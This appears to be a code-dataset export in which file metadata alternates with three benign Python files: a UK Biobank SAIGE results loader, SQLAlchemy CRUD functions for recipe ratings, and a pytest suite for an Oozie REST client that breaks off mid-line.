0.042434
0.042434
0
0.026195
0.201433
5,163
156
115
33.096154
0.751152
0.131125
0
0.065217
0
0
0.042405
0.004712
0
0
0
0
0
1
0.141304
false
0
0.119565
0
0.282609
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb6b56e79718d96881ce563456b6ed24e5bfc35
2,912
py
Python
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
8
2020-03-06T12:32:44.000Z
2021-11-17T18:00:13.000Z
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
1
2021-11-02T20:09:05.000Z
2021-11-03T13:10:05.000Z
saige/load_results.py
Nealelab/ukb_common
ee063971d48e15ea4c525d26cf6745930d7106dc
[ "MIT" ]
3
2020-07-27T04:14:52.000Z
2021-09-15T13:43:23.000Z
#!/usr/bin/env python3 __author__ = 'konradk' from ukb_common import * import argparse import tempfile PHENO_KEY_FIELDS = ('trait_type', 'phenocode', 'pheno_sex', 'coding', 'modifier') def main(args): hl.init(master=f'local[{args.n_threads}]', log=hl.utils.timestamp_path(os.path.join(tempfile.gettempdir(), 'load_results'), suffix='.log'), default_reference=args.reference) cases, controls = get_cases_and_controls_from_log(args.saige_run_log_format) quantitative_trait = args.trait_type in ('continuous', 'biomarkers') heritability = get_heritability_from_log(args.null_glmm_log, quantitative_trait) if args.null_glmm_log else -1.0 inv_normalized = get_inverse_normalize_status(args.null_glmm_log) if args.null_glmm_log else 'NA' saige_version = get_saige_version_from_log(args.null_glmm_log) if args.null_glmm_log else 'NA' extension = 'single.txt' if args.analysis_type == 'gene' else 'single_variant.txt' pheno_key_dict = {k: getattr(args, k) for k in PHENO_KEY_FIELDS} if args.analysis_type == 'gene': load_gene_data(args.input_dir, pheno_key_dict, args.gene_map_ht_raw_path, cases, controls, heritability, saige_version, inv_normalized, args.overwrite) load_variant_data(args.input_dir, pheno_key_dict, args.ukb_vep_ht_path, extension, cases, controls, heritability, saige_version, inv_normalized, args.overwrite, args.legacy_annotations) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--input_dir', help='Input directory', required=True) parser.add_argument('--trait_type', help='Trait type', required=True) parser.add_argument('--phenocode', help='Phenotype ID', required=True) parser.add_argument('--pheno_sex', help='Phenotype sex', default='both_sexes') parser.add_argument('--coding', help='Phenotype coding', default='') parser.add_argument('--modifier', help='Phenotype modifier', default='') parser.add_argument('--null_glmm_log', help='Path to log file from null model') parser.add_argument('--saige_run_log_format', help='Path to log file from SAIGE test with {chr} placeholder', required=True) parser.add_argument('--analysis_type', help='Analysis type', choices=('gene', 'variant'), default='gene') parser.add_argument('--reference', help='Reference genome', default='GRCh38') parser.add_argument('--gene_map_ht_raw_path', help='Path to raw gene map') parser.add_argument('--ukb_vep_ht_path', help='Path to UKB VEP data', required=True) parser.add_argument('--n_threads', help='Number of threads to run', type=int, default=8) parser.add_argument('--legacy_annotations', help='Use old annotation picking (preferred for genotype data)', action='store_true') parser.add_argument('--overwrite', help='Overwrite everything', action='store_true') args = parser.parse_args() main(args)
56
164
0.736607
404
2,912
5.007426
0.309406
0.066733
0.12605
0.044488
0.286209
0.176965
0.131488
0.131488
0.099852
0.037568
0
0.002368
0.129808
2,912
52
165
56
0.795975
0.007212
0
0
0
0
0.260809
0.023175
0
0
0
0
0
1
0.025641
false
0
0.076923
0
0.102564
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb72defd6c6f62fdddbb438cb6348c91bc60611
4,981
py
Python
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
1
2022-01-29T20:33:30.000Z
2022-01-29T20:33:30.000Z
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
2
2022-03-08T06:41:22.000Z
2022-03-09T11:52:06.000Z
app/db/crud/recipeBewertung.py
baldur132/essensfindung
e1a8106d8a1de857340229a5fe36ca6910c55b35
[ "MIT" ]
6
2022-01-06T15:02:59.000Z
2022-02-02T08:08:56.000Z
"""All DB functions for the Bewertung table""" from typing import List from typing import Union import sqlalchemy from sqlalchemy.orm import Session from db.base import BewertungRecipe from db.base import Person from db.crud.user import get_user_by_mail from schemes import scheme_recipe from schemes import scheme_user from schemes.exceptions import DatabaseException from schemes.exceptions import DuplicateEntry from schemes.exceptions import UserNotFound from tools.my_logging import logger def get_bewertung_from_user_to_recipe( db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase ) -> BewertungRecipe: """Return a specific bewertung from a user to only one recipe Args: db (Session): Session to the DB user (scheme_user.UserBase): Specifie the User recipe (scheme_recipe.RecipeBase): Specifie the reciepe Returns: BewertungRecipe: Return one bewertung that match the recipe - user """ return ( db.query(BewertungRecipe) .join(Person, Person.email == BewertungRecipe.person_email) .filter(Person.email == user.email) .filter(BewertungRecipe.rezept_id == recipe.id) .first() ) def get_all_user_bewertungen(db: Session, user: scheme_user.UserBase) -> Union[List[BewertungRecipe], None]: """Return all bewertugen from one to the recipes User Args: db (Session): Session to the DB user (scheme_user.UserBase): The user to select Returns: Union[List[BewertungRecipe], None] """ user: Person = get_user_by_mail(db, user.email) if user is None: return None else: return user.bewertungenRezept def create_bewertung(db: Session, assessment: scheme_recipe.RecipeBewertungCreate) -> BewertungRecipe: """Create / Add a Bewertung to the DB. Timestamp and ID will set automatic. Args: db (Session): Session to the DB assessment (scheme_recipe.RecipeBewertungCreate): Bewertung to add. This include the Person and Recipe for the mapping of the Bewertung Raises: UserNotFound: If the user does not exist DuplicateEntry: Duplicate Primary Key Returns: BewertungRecipe: Return if success """ if get_user_by_mail(db, assessment.person.email) is None: raise UserNotFound(f"User {assessment.person.email} does not exist", assessment.person.email) db_assessment = BewertungRecipe( person_email=assessment.person.email, rezept_id=assessment.recipe.id, rezept_name=assessment.name, kommentar=assessment.comment, rating=assessment.rating, ) try: db.add(db_assessment) db.commit() db.refresh(db_assessment) logger.info( "Added assessment to db... recipe id:%s\temail:%s\trating:%s\tcomment:%s", db_assessment.rezept_id, db_assessment.person_email, db_assessment.rating, db_assessment.kommentar, ) return db_assessment except sqlalchemy.exc.IntegrityError as error: raise DuplicateEntry("Assessment already exist") from error def update_assessment( db: Session, old_bewertung: scheme_recipe.RecipeBewertungCreate, new_bewertung: scheme_recipe.RecipeBewertungCreate ) -> BewertungRecipe: """Update the comment and rating of a bewertung Args: db (Session): Session to the DB old_bewertung (scheme_recipe.RecipeBewertungCreate): The old Bewertung new_bewertung (scheme_recipe.RecipeBewertungCreate): The updated Bewertung Returns: BewertungRecipe: New Bewertung from `get_bewertung_from_user_to_recipe` """ rows = ( db.query(BewertungRecipe) .filter(BewertungRecipe.person_email == old_bewertung.person.email) .filter(BewertungRecipe.rezept_id == old_bewertung.recipe.id) .update({BewertungRecipe.kommentar: new_bewertung.comment, BewertungRecipe.rating: new_bewertung.rating}) ) if rows == 0: raise DatabaseException("Can not update assessment. Does the User and the Recipe exist?") db.commit() logger.info("Updated bewertung %s - %s", old_bewertung.person.email, old_bewertung.recipe.id) return get_bewertung_from_user_to_recipe(db, new_bewertung.person, new_bewertung.recipe) def delete_bewertung(db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase) -> int: """Delete one Bewertung Args: db (Session): Session to the db user (scheme_user.User): The owner of the Bewertung recipe (scheme_recipe.RecipeBase): The corrosponding Recipe Returns: int: Number of effected rows """ rows = ( db.query(BewertungRecipe) .filter(BewertungRecipe.person_email == user.email, BewertungRecipe.rezept_id == recipe.id) .delete() ) db.commit() logger.info("Deleted bewertung %s - %s", user.email, recipe.id) return rows
34.116438
119
0.700863
598
4,981
5.704013
0.202341
0.041923
0.024626
0.032249
0.278804
0.164761
0.147464
0.122545
0.075344
0.075344
0
0.000257
0.218229
4,981
145
120
34.351724
0.875706
0.299739
0
0.131579
0
0.013158
0.076271
0.019068
0
0
0
0
0
1
0.065789
false
0
0.171053
0
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb88a765d8bc6b5e477b1b64ee817472716d342
66,946
py
Python
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
9
2017-03-16T15:30:23.000Z
2019-08-07T03:35:59.000Z
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
43
2017-02-01T22:20:52.000Z
2020-08-10T08:48:20.000Z
tests/pyoozie/test_client.py
Shopify/pyoozie
6dcbcb8249820dc40b5a9bbbc04b0370240fd706
[ "MIT" ]
5
2017-02-08T17:59:06.000Z
2020-11-12T11:29:08.000Z
# Copyright (c) 2017 "Shopify inc." All rights reserved. # Use of this source code is governed by a MIT-style license that can be found in the LICENSE file. from __future__ import unicode_literals import copy import mock import pytest import requests_mock import requests from pyoozie import exceptions from pyoozie import model from pyoozie import client from pyoozie import xml # TODO: share these with test_model.py? SAMPLE_COORD_ID = '0123456-123456789012345-oozie-oozi-C' SAMPLE_COORD_ACTION = '0123456-123456789012345-oozie-oozi-C@12' SAMPLE_WF_ID = '0123456-123456789012345-oozie-oozi-W' SAMPLE_WF_ACTION = '0123456-123456789012345-oozie-oozi-W@foo' @pytest.fixture def oozie_config(): return { 'url': 'http://localhost:11000/oozie', 'user': 'oozie', 'timeout': 30, 'verbose': False, 'launcher_memory_in_mb': '5000', 'launcher_queue': 'test.ignore', } @pytest.fixture def api(oozie_config): with mock.patch('pyoozie.client.OozieClient._test_connection'): yield client.OozieClient(**oozie_config) @pytest.fixture def api_with_session(oozie_config): with mock.patch('pyoozie.client.OozieClient._test_connection'): session = requests.Session() session.headers.update({'test-header': 'true'}) yield client.OozieClient(session=session, **oozie_config) @pytest.fixture def sample_coordinator_running(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'RUNNING' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_suspended(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'SUSPENDED' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_killed(api): info = { 'coordJobId': SAMPLE_COORD_ID, 'status': 'KILLED' } return model.Coordinator(api, info, None) @pytest.fixture def sample_coordinator_action_running(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'RUNNING' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action @pytest.fixture def sample_coordinator_action_suspended(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'SUSPENDED' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action @pytest.fixture def sample_coordinator_action_killed(api, sample_coordinator_running): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'KILLED' } action = model.CoordinatorAction(api, info, sample_coordinator_running) action.parent().actions = {12: action} return action @pytest.fixture def sample_coordinator_action_killed_with_killed_coordinator(api, sample_coordinator_killed): info = { 'id': SAMPLE_COORD_ACTION, 'status': 'KILLED' } action = model.CoordinatorAction(api, info, sample_coordinator_killed) action.parent().actions = {12: action} return action @pytest.fixture def sample_workflow_running(api): info = { 'id': SAMPLE_WF_ID, 'status': 'RUNNING' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_suspended(api): info = { 'id': SAMPLE_WF_ID, 'status': 'SUSPENDED' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_killed(api): info = { 'id': SAMPLE_WF_ID, 'status': 'KILLED' } return model.Workflow(api, info, None) @pytest.fixture def sample_workflow_prep(api): info = { 'id': SAMPLE_WF_ID, 'status': 'PREP' } return model.Workflow(api, info, None) class TestOozieClientCore(object): @mock.patch('pyoozie.client.OozieClient._test_connection') def test_construction(self, mock_test_conn, oozie_config): api = client.OozieClient(**oozie_config) assert not mock_test_conn.called assert api._url == 'http://localhost:11000/oozie' assert api._session @mock.patch('pyoozie.client.OozieClient._test_connection') def test_construction_custom_session(self, mock_test_conn, oozie_config): session = requests.Session() session.auth = ('user', 'pass') api = client.OozieClient(session=session, **oozie_config) assert not mock_test_conn.called assert api._session.auth == session.auth def test_test_connection(self, oozie_config): with requests_mock.mock() as m: session = requests.Session() m.get('http://localhost:11000/oozie/versions', text='[0, 1, 2]') client.OozieClient(**oozie_config)._test_connection() client.OozieClient(session=session, **oozie_config)._test_connection() m.get('http://localhost:11000/oozie/versions', text='[0, 1]') with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'does not support API version 2' in str(err) m.get('http://localhost:11000/oozie/versions', status_code=404) with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'Unable to contact Oozie server' in str(err) m.get('http://localhost:11000/oozie/versions', text='>>> fail <<<') with pytest.raises(exceptions.OozieException) as err: client.OozieClient(**oozie_config)._test_connection() assert 'Invalid response from Oozie server' in str(err) def test_test_connection_is_called_once(self, oozie_config): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/admin/build-version', text='{}') with mock.patch('pyoozie.client.OozieClient._test_connection') as m_test: oozie_client = client.OozieClient(**oozie_config) oozie_client.admin_build_version() oozie_client.admin_build_version() m_test.assert_called_once_with() def test_request(self, api): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api._request('GET', 'endpoint', None, None) assert result['result'] == 'pass' with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint') result = api._request('GET', 'endpoint', None, None) assert result is None with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='>>> fail <<<') with pytest.raises(exceptions.OozieException) as err: api._request('GET', 'endpoint', None, None) assert 'Invalid response from Oozie server' in str(err) def test_request_uses_session_params(self, api_with_session): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api_with_session._request('GET', 'endpoint', None, None) assert result['result'] == 'pass' assert m.last_request.headers['test-header'] == 'true' def test_get(self, api): with requests_mock.mock() as m: m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}') result = api._get('endpoint') assert result['result'] == 'pass' def test_put(self, api): with requests_mock.mock() as m: headers = {'Content-Type': 'application/xml'} m.put('http://localhost:11000/oozie/v2/endpoint', request_headers=headers) result = api._put('endpoint') assert result is None def test_post(self, api): with requests_mock.mock() as m: headers = {'Content-Type': 'application/xml'} m.post('http://localhost:11000/oozie/v2/endpoint', request_headers=headers, text='{"result": "pass"}') result = api._post('endpoint', content='<xml/>') assert result['result'] == 'pass' def test_headers(self, api): headers = api._headers() assert headers == {} headers = api._headers(content_type='foo/bar') assert headers == {'Content-Type': 'foo/bar'} class TestOozieClientAdmin(object): @pytest.mark.parametrize("function, endpoint", [ ('admin_status', 'status'), ('admin_os_env', 'os-env'), ('admin_java_properties', 'java-sys-properties'), ('admin_configuration', 'configuration'), ('admin_instrumentation', 'instrumentation'), ('admin_metrics', 'metrics'), ('admin_build_version', 'build-version'), ('admin_available_timezones', 'available-timezones'), ('admin_queue_dump', 'queue-dump'), ('admin_available_oozie_servers', 'available-oozie-servers'), ]) def test_simple_admin(self, function, endpoint, api): with mock.patch.object(api, '_get', return_value=True) as mock_get: assert api.__getattribute__(function)() mock_get.assert_called_with('admin/' + endpoint) def test_admin_list_sharelib(self, api): reply = { 'sharelib': [ {'name': 'oozie'}, {'name': 'hive'}, {'name': 'distcp'}, {'name': 'hcatalog'}, {'name': 'sqoop'}, {'name': 'mapreduce-streaming'}, {'name': 'spark'}, {'name': 'hive2'}, {'name': 'pig'} ] } expected = ['oozie', 'hive', 'distcp', 'hcatalog', 'sqoop', 'mapreduce-streaming', 'spark', 'hive2', 'pig'] with mock.patch.object(api, '_get', return_value=reply) as mock_get: assert api.admin_list_sharelib() == expected mock_get.assert_called_with('admin/list_sharelib') def test_admin_list_all_sharelib(self, api): libs = { 'admin/list_sharelib?lib=oozie': {'sharelib': [{'files': ['oozie1', 'oozie2'], 'name': 'oozie'}]}, 'admin/list_sharelib?lib=distcp': {'sharelib': [{'files': ['distcp1', 'distcp2'], 'name': 'distcp'}]}, } expected = { 'oozie': ['oozie1', 'oozie2'], 'distcp': ['distcp1', 'distcp2'], } with mock.patch.object(api, 'admin_list_sharelib', return_value=['oozie', 'distcp']): with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda endpoint: libs[endpoint] result = api.admin_list_all_sharelib() assert result == expected class TestOozieClientJobsQuery(object): def test_jobs_query_workflow_parameters(self, api): mock_result = { 'total': 0, 'workflows': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Workflow) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, user='john_doe') mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, name='my_workflow') mock_get.assert_called_with('jobs?jobtype=wf&filter=name=my_workflow&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.RUNNING) mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING&offset=1&len=5000') api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.running()) mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING;status=SUSPENDED&offset=1&len=5000') api._jobs_query( model.ArtifactType.Workflow, user='john_doe', name='my_workflow', status=model.WorkflowStatus.running()) mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe;name=my_workflow;status=RUNNING;' 'status=SUSPENDED&offset=1&len=5000') def test_jobs_query_coordinator_parameters(self, api): mock_result = { 'total': 0, 'coordinatorjobs': [] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Coordinator) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, user='john_doe') mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, name='my_coordinator') mock_get.assert_called_with('jobs?jobtype=coordinator&filter=name=my_coordinator&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.RUNNING) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING&offset=1&len=5000') api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.running()) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING;status=RUNNINGWITHERROR;' 'status=SUSPENDED;status=SUSPENDEDWITHERROR&offset=1&len=5000') api._jobs_query( model.ArtifactType.Coordinator, user='john_doe', name='my_coordinator', status=model.CoordinatorStatus.running()) mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe;name=my_coordinator;' 'status=RUNNING;status=RUNNINGWITHERROR;status=SUSPENDED;' 'status=SUSPENDEDWITHERROR&offset=1&len=5000') def test_jobs_query_bad_parameters(self, api): with pytest.raises(KeyError) as err: api._jobs_query(model.ArtifactType.CoordinatorAction) assert 'ArtifactType.CoordinatorAction' in str(err) with pytest.raises(KeyError) as err: api._jobs_query(model.ArtifactType.WorkflowAction) assert 'ArtifactType.WorkflowAction' in str(err) @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_workflow_pagination(self, _, api): mock_results = iter( [ { 'total': 5001, 'workflows': [{'id': '1-W'}, {'id': '2-W'}] }, { 'total': 5001, 'workflows': [{'id': '3-W'}] } ] ) with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda url: next(mock_results) result = api._jobs_query(model.ArtifactType.Workflow) assert len(result) == 3 mock_get.assert_any_call('jobs?jobtype=wf&offset=1&len=5000') mock_get.assert_any_call('jobs?jobtype=wf&offset=5001&len=5000') with pytest.raises(StopIteration): next(mock_results) @pytest.mark.parametrize('limit, expected_result_count, expected_queries', [ (0, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']), (2, 2, ['jobs?jobtype=coordinator&offset=1&len=2']), (6000, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']) ]) @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_coordinator_pagination(self, _, limit, expected_result_count, expected_queries, api): mock_results = iter( [ { 'total': 5001, 'coordinatorjobs': [{'coordJobId': '1-C'}, {'coordJobId': '2-C'}] }, { 'total': 5001, 'coordinatorjobs': [{'coordJobId': '3-C'}] } ] ) with mock.patch.object(api, '_get') as mock_get: mock_get.side_effect = lambda url: next(mock_results) result = api._jobs_query(model.ArtifactType.Coordinator, limit=limit) assert len(result) == expected_result_count mock_get.assert_has_calls(mock.call(query) for query in expected_queries) @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_workflow_details(self, fill_in_details, api): mock_result = { 'total': 1, 'workflows': [{'id': '1-W'}] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Workflow, details=False) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') assert not fill_in_details.called api._jobs_query(model.ArtifactType.Workflow, details=True) mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000') assert fill_in_details.called @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True) def test_jobs_query_coordinator_details(self, fill_in_details, api): mock_result = { 'total': 1, 'coordinatorjobs': [{'coordJobId': '1-C'}] } with mock.patch.object(api, '_get') as mock_get: mock_get.return_value = mock_result api._jobs_query(model.ArtifactType.Coordinator, details=False) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') assert not fill_in_details.called api._jobs_query(model.ArtifactType.Coordinator, details=True) mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000') assert fill_in_details.called def test_jobs_all_workflows(self, api, sample_workflow_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_workflows() mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user=None, limit=0) api.jobs_all_workflows(name='my_workflow') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=0) api.jobs_all_workflows(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user='john_doe', limit=0) api.jobs_all_workflows(name='my_workflow', user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=0) api.jobs_all_workflows(name='my_workflow', limit=10) mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=10) def test_jobs_all_active_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.active() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_active_workflows() mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses ) api.jobs_all_active_workflows(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_running_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_all_running_workflows() mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses ) api.jobs_all_running_workflows(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses ) def test_jobs_running_workflows(self, api, sample_workflow_running): expected_statuses = model.WorkflowStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_running_workflows('my_workflow') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, name='my_workflow', user=None, status=expected_statuses) api.jobs_running_workflows('my_workflow', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Workflow, details=True, name='my_workflow', user='john_doe', status=expected_statuses) def test_jobs_last_workflow_parameters(self, api, sample_workflow_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_workflow_running] api.jobs_last_workflow('my_workflow') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=1) api.jobs_last_workflow('my_workflow', user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=1) def test_jobs_workflow_names_parameters(self, api): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [] api.jobs_workflow_names() mock_query.assert_called_with(model.ArtifactType.Workflow, user=None, details=False, limit=0) api.jobs_workflow_names(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Workflow, user='john_doe', details=False, limit=0) def test_jobs_all_coordinators(self, api, sample_coordinator_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name=None, user=None, limit=0 ) api.jobs_all_coordinators(name='my_coordinator') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=0 ) api.jobs_all_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name=None, user='john_doe', limit=0 ) api.jobs_all_coordinators(name='my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user='john_doe', limit=0) api.jobs_all_coordinators(name='my_coordinator', limit=1) mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=1) def test_jobs_all_active_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.active() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_active_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses ) api.jobs_all_active_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_running_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_all_running_coordinators() mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses ) api.jobs_all_running_coordinators(user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses ) def test_jobs_all_suspended_coordinators(self, api, sample_coordinator_suspended): expected_statuses = model.CoordinatorStatus.suspended() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_suspended] api.jobs_all_suspended_coordinators() mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, status=expected_statuses) api.jobs_all_suspended_coordinators(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', status=expected_statuses) def test_jobs_running_coordinators(self, api, sample_coordinator_running): expected_statuses = model.CoordinatorStatus.running() with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_running_coordinators('my_coordinator') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user=None, status=expected_statuses) api.jobs_running_coordinators('my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user='john_doe', status=expected_statuses) def test_jobs_last_coordinator_parameters(self, api, sample_coordinator_running): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [sample_coordinator_running] api.jobs_last_coordinator('my_coordinator') mock_query.assert_called_with(model.ArtifactType.Coordinator, name='my_coordinator', user=None, limit=1) api.jobs_last_coordinator('my_coordinator', user='john_doe') mock_query.assert_called_with( model.ArtifactType.Coordinator, name='my_coordinator', user='john_doe', limit=1) def test_jobs_coordinator_names_parameters(self, api): with mock.patch.object(api, '_jobs_query') as mock_query: mock_query.return_value = [] api.jobs_coordinator_names() mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, details=False) api.jobs_coordinator_names(user='john_doe') mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', details=False) class TestOozieClientJobCoordinatorQuery(object): def test_coordinator_query_parameters(self, api): mock_coord = { 'total': 0, 'coordJobId': SAMPLE_COORD_ID, 'actions': [] } mock_action = { 'id': SAMPLE_COORD_ACTION, } with mock.patch.object(api, '_get') as mock_get: def dummy_get(url): if url.startswith('job/' + SAMPLE_COORD_ID + '?'): return mock_coord elif url.startswith('job/' + SAMPLE_COORD_ID + '@'): return mock_action assert False, 'Unexpected URL' mock_get.side_effect = dummy_get with pytest.raises(ValueError) as err: api._coordinator_query('foo') assert 'Unrecognized job ID' in str(err) assert not mock_get.called api._coordinator_query(SAMPLE_COORD_ID) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1') mock_get.reset_mock() with pytest.raises(ValueError) as err: api._coordinator_query(SAMPLE_COORD_ID + '@foo') assert 'Unrecognized job ID' in str(err) assert not mock_get.called api._coordinator_query(SAMPLE_COORD_ACTION) mock_get.assert_any_call('job/' + SAMPLE_COORD_ID 